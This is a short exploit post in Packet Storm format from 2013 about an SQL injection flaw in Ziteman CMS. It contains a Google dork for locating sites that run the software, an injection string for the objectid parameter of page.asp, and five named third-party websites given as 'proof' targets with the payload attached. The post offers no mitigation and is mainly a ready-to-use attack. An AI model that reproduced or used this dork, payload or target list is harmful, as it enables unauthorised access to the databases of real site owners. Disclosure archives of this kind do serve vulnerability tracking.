Ziteman CMS SQL Injection

2013-09-11T00:00:00
ID PACKETSTORM:123197
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-11T00:00:00

Description

                                        
                                            `#********************************************************************************  
# Exploit Title : Ziteman CMS SQL Injection Vulnerability  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Software Link : http://www.ziteman.dk  
#  
# Tested on: Windows 7 , Linux  
#  
# Google Dork : intext:" Powered by Ziteman CMS"  
#  
# Date: 2013/09/11  
#  
--------------------------------------------------------------------  
# Exploit : Sql Injection  
#  
# Location : [Target]/page.asp?objectid=1A%00xa7A%3f&zcs=62  
#  
#  
# Proof:  
#  
# http://www.ark-jr.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62  
#  
# http://www.apservice.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62  
#  
# http://www.cjservice.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62  
#  
# http://www.slibecentral.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62  
#  
# http://www.vhm.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62  
#  
######################  
discovered by : ACC3SS  
######################  
`